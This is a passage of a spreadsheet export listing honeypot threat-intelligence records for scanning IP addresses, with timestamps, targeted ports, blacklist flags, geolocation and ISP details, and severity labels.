    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23&amp;&amp;9100&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:3f8b"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3158"/>
    <x v="3158"/>
    <s v="220-133-142-194.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T14:00:53"/>
    <d v="2023-11-29T02:22:40"/>
    <d v="2025-04-04T14:00:53"/>
    <n v="1430"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;20000&amp;&amp;23&amp;&amp;NA&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:8ec2"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3159"/>
    <x v="3159"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:59:07"/>
    <d v="2025-04-04T13:59:07"/>
    <d v="2025-04-04T13:59:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Salem"/>
    <s v="Omalur"/>
    <s v="1261049"/>
    <s v="NA"/>
    <s v="11.741"/>
    <s v="78.0456"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:e379"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3160"/>
    <x v="3160"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:56:01"/>
    <d v="2025-04-04T13:54:50"/>
    <d v="2025-04-04T13:56:01"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="1994-02-01"/>
    <s v="HKTNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a846:3af1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3161"/>
    <x v="3161"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:53:52"/>
    <d v="2025-04-04T13:53:52"/>
    <d v="2025-04-04T13:53:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="48"/>
    <s v="Mykolayiv Oblast"/>
    <s v="Pervomaysk Raion"/>
    <s v="Pervomaysk"/>
    <s v="697593"/>
    <s v="NA"/>
    <s v="48.0451"/>
    <s v="30.8884"/>
    <s v="197255"/>
    <s v="VSESVIT-AS"/>
    <s v="ZAT Televizijni kabelni merezhi Vsesvit"/>
    <s v="corporate"/>
    <s v="Cjsc TKM Vsesvit"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5bd9:3cc8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3162"/>
    <x v="3162"/>
    <s v="85-67-19-212.pool.digikabel.hu"/>
    <x v="0"/>
    <d v="2025-04-04T13:46:07"/>
    <d v="2025-04-04T13:45:19"/>
    <d v="2025-04-04T13:46:07"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="HU"/>
    <s v="Hungary"/>
    <s v="BU"/>
    <s v="Budapest"/>
    <s v="NA"/>
    <s v="Budapest"/>
    <s v="3054643"/>
    <s v="1007"/>
    <s v="47.4979"/>
    <s v="19.0402"/>
    <s v="20845"/>
    <s v="DIGI Tavkozlesi es Szolgaltato Kft."/>
    <s v="DIGI Tavkozlesi es Szolgaltato Kft"/>
    <s v="business"/>
    <s v="INVITEL / DIGI"/>
    <s v="2004-10-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:5543:13d4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3163"/>
    <x v="3163"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:36:28"/>
    <d v="2025-02-11T17:50:27"/>
    <d v="2025-04-04T13:36:28"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Patna"/>
    <s v="Patna (Salimpur Ahra)"/>
    <s v="1260086"/>
    <s v="800028"/>
    <s v="25.61"/>
    <s v="85.1427"/>
    <s v="134874"/>
    <s v="Acme Diginet Corporation Pvt. Ltd"/>
    <s v="Acme Diginet Corporation Pvt. Ltd"/>
    <s v="business"/>
    <s v="Acme Diginet Corporation Pvt. Ltd."/>
    <s v="2016-01-19"/>
    <s v="ACMEDIGINET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ce:e15e"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3164"/>
    <x v="3164"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:29:38"/>
    <d v="2024-11-27T14:26:33"/>
    <d v="2025-04-04T13:29:38"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore (Lakshmi Mills Colony)"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.017"/>
    <s v="76.9789"/>
    <s v="59179"/>
    <s v="MINS Technologies Private Limited"/>
    <s v="MINS Technologies Private Limited"/>
    <s v="business"/>
    <s v="MINS Technologies Private Limited"/>
    <s v="1999-07-20"/>
    <s v="MINS"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cb70:9a7a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3165"/>
    <x v="3165"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:29:18"/>
    <d v="2025-04-04T12:46:17"/>
    <d v="2025-04-04T13:29:18"/>
    <n v="39"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Dinajpur Dakshin"/>
    <s v="Daulatpur"/>
    <s v="1273379"/>
    <s v="NA"/>
    <s v="25.326"/>
    <s v="88.3299"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Raiganj Cable TV PVT LTD"/>
    <s v="2021-11-03"/>
    <s v="RCTVPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67af:a820"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3166"/>
    <x v="3166"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:18:24"/>
    <d v="2025-04-03T18:09:42"/>
    <d v="2025-04-04T13:18:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3589"/>
    <s v="127.115"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dda6:d359"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3167"/>
    <x v="3167"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:10:19"/>
    <d v="2025-04-04T13:10:19"/>
    <d v="2025-04-04T13:10:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afcb:389d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3168"/>
    <x v="3168"/>
    <s v="114-35-174-250.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T13:01:01"/>
    <d v="2024-12-17T11:37:19"/>
    <d v="2025-04-04T13:01:01"/>
    <n v="241"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="23&amp;&amp;8639&amp;&amp;59173&amp;&amp;59180&amp;&amp;59163&amp;&amp;59213&amp;&amp;6538&amp;&amp;38474&amp;&amp;38492&amp;&amp;38510&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:aefa"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3169"/>
    <x v="3169"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:52:07"/>
    <d v="2025-04-04T12:46:35"/>
    <d v="2025-04-04T12:52:07"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="1080&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="24086"/>
    <s v="Viettel Corporation"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7467:d775"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3170"/>
    <x v="3170"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:46:35"/>
    <d v="2025-01-20T10:48:52"/>
    <d v="2025-04-04T12:46:35"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Yongin-si"/>
    <s v="Yongin-si (Cheoin-gu)"/>
    <s v="10914977"/>
    <s v="NA"/>
    <s v="37.2033"/>
    <s v="127.253"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Sudogwongangnambonbujang"/>
    <s v="2006-11-01"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79a8:dd9a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3171"/>
    <x v="3171"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:41:17"/>
    <d v="2025-04-04T12:41:17"/>
    <d v="2025-04-04T12:41:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="24086"/>
    <s v="VIETTEL-AS-VN"/>
    <s v="Viettel Corporation"/>
    <s v="corporate"/>
    <s v="Viettel Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:746c:63b3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3172"/>
    <x v="3172"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T12:33:34"/>
    <d v="2025-04-04T12:33:34"/>
    <d v="2025-04-04T12:33:34"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
